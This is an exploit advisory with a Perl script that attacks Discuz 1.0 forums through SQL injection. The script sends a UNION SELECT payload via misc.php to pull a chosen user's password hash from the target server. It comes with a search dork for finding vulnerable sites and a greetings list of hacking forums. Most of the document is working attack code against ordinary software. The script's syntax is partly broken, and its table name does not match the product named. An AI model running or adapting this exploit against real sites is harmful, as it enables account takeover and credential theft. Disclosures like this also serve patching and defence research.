Discuz 1.03 - SQL Injection









| # Title    : Discuz  Remote SQL Injection Exploit Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
| # Published: http://download.comsenz.com/Discuz/   [China Script]                                                             
| # Dork     : Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org                                    
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Remote SQL Injection Exploit                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
use IO::Socket; 
print q{ 
#    Discuz  Remote SQL Injection Exploit            #
#    By indoushka                                    #
#    www.iq-ty.com                                   #
#    Souk Naamane  (00213771818860)                  #
#    Algeria Hackerz   (indoushka@hotmail.com)       # 
# Dork:Powered by Discuz! 1.0 © 2002,Crossday Studio #            
if (!$ARGV[2]) { 
print q{ 
	Usage: perl  Discuz.pl host /directory/ victim_userid 
       perl  Discuz.pl www.Discuz.com /forum/ 1 
$server = $ARGV[0]; 
$dir    = $ARGV[1]; 
$user   = $ARGV[2]; 
$myuser = $ARGV[3]; 
$mypass = $ARGV[4]; 
$myid   = $ARGV[5]; 
print "------------------------------------------------------------------------------------------------\r\n"; 
print "[>] SERVER: $server\r\n"; 
print "[>]    DIR: $dir\r\n"; 
print "[>] USERID: $user\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
$server =~ s/(http:\/\/)//eg; 
$path  = $dir; 
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
print "[~] PREPARE TO CONNECT...\r\n"; 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
print "[+] CONNECTED\r\n"; 
print "[~] SENDING QUERY...\r\n"; 
print $socket "GET $path HTTP/1.1\r\n"; 
print $socket "Host: $server\r\n"; 
print $socket "Accept: */*\r\n"; 
print $socket "Connection: close\r\n\r\n"; 
print "[+] DONE!\r\n\r\n"; 
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
while ($answer = <$socket>) 
 if ($answer =~/(\w{32})/) 
  if ($1 ne 0) { 
   print "Password Hash is: ".$1."\r\n"; 
print "--------------------------------------------------------------------------------------\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n";
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *